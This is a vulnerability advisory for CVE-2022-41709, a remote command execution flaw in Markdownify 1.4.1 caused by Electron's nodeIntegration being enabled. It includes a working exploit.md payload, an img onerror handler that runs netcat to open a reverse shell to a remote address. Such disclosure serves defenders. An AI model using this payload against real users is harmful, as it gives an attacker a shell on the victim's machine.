Markdownify 1.4.1 - RCE

Summary

NameMarkdownify 1.4.1 - RCE
Code nameAdams
ProductMarkdownify
Affected versionsVersion 1.4.1
StatePublic
Release date2022-10-14

Vulnerability

KindRemote command execution
Rule004. Remote command execution
RemoteYes
CVSSv3 VectorCVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
CVSSv3 Base Score8.6
Exploit availableYes
CVE ID(s)CVE-2022-41709

Description

Markdownify version 1.4.1 allows an external attacker to execute arbitrary code remotely on any client attempting to view a malicious markdown file through Markdownify. This is possible because the application has the "nodeIntegration" option enabled.

Vulnerability

This vulnerability occurs because the application has the "nodeIntegration" option enabled. Due to the above, an attacker can embed malicious JS code in a markdown file and send it to the victim for viewing to achieve an RCE.

Exploitation

To exploit this vulnerability, the following file must be sent to a user to be opened with Markdownify.

exploit.md

<img src=1 onerror="require('child_process').exec('nc 192.168.20.38 4444 -e /bin/bash');"/>

Evidence of exploitation

rce-markdownify.gif

Our security policy

We have reserved the CVE-2022-41709 to refer to this issue from now on.

System Information

  • Version: Markdownify 1.4.1

  • Operating System: GNU/Linux

Mitigation

There is currently no patch available for this vulnerability.

Credits

The vulnerability was discovered by Carlos Bello from Fluid Attacks' Offensive Team.

References

Vendor page https://github.com/amitmerchant1990/electron-markdownify

Timeline

Time-lapse-logo

2022-09-23

Vulnerability discovered.

Time-lapse-logo

2022-09-23

Vendor contacted.

Time-lapse-logo

2022-09-23

Vendor replied acknowledging the report.

Time-lapse-logo

2022-09-23

Vendor Confirmed the vulnerability.

Time-lapse-logo

2022-10-14

Public Disclosure.